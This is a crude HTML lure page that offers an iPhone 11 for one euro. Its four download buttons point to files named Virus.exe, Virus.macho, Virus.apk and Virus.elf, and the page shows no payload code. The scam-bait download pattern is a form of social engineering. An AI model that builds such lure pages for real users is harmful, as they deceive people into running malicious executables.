<!DOCTYPE html>
<html>
    <head>
        <title>Iphone 11 a 1€ !</title>
    </head>

        <body style = "background-color: brown;">
          <style type="text/css">

         <p1> {
         position:fixed;
         }

         <h1> {
         position:relative;
         left:45%;
         }

         .button1 {
          display: block;
         border: 1px solid #ff0000;
         position:relative;
         left:37.5%;
         background-color: #ff0000;
         Color: green;
         width: 368px;
         height: 70px;
         font-size: 1.55rem;
         font-weight: bold;
         }

         .button2 {
         display: block;
         border: 1px solid #ff0000;
         position:relative;
         bottom : 10%;
         left:37.5%;
         top: 20px;
         background-color: #ff0000;
         Color: green;
         width: 300px;
         height: 70px;
         font-size: 1.55rem;
         font-weight: bold;
         }

         .button3 {
         display: block;
         border: 1px solid #ff0000;
         position:relative;
         left:37.5%;
         top: 40px;
         background-color: #ff0000;
         Color: green;
         width: 360px;
         height: 70px;
         font-size: 1.55rem;
         font-weight: bold;
         }

         .button4 {
         display: block;
         border: 1px solid #ff0000;
         position:relative;
         left:37.5%;
         top: 60px;
         background-color: #ff0000;
         Color: green;
         width: 330px;
         height: 70px;
         font-size: 1.55rem;
         font-weight: bold;
         }
         
        </style>
             <p1>By Virus.exe</p1>
           <center>
            <h1>tqt( ͡° ͜ʖ ͡°)</h1>
          </center>
          <center>
           <img src="https://media3.giphy.com/media/ZAwg85zIqPou1q5OXs/giphy.gif" alt="" />
        </center>
          <input type="button" value="DOWNLOAD FOR WINDOWS !" class=button1 onclick="window.location='Virus.exe';">
          <input type="button" value="DOWNLOAD FOR MAC !" class=button2 onclick="window.location='Virus.macho';">
          <input type="button" value="DOWNLOAD FOR ANDROID !" class=button3 onclick="window.location='Virus.apk';">
          <input type="button" value="DOWNLOAD FOR LINUX !" class=button4 onclick="window.location='Virus.elf';">
     </body>
</html>
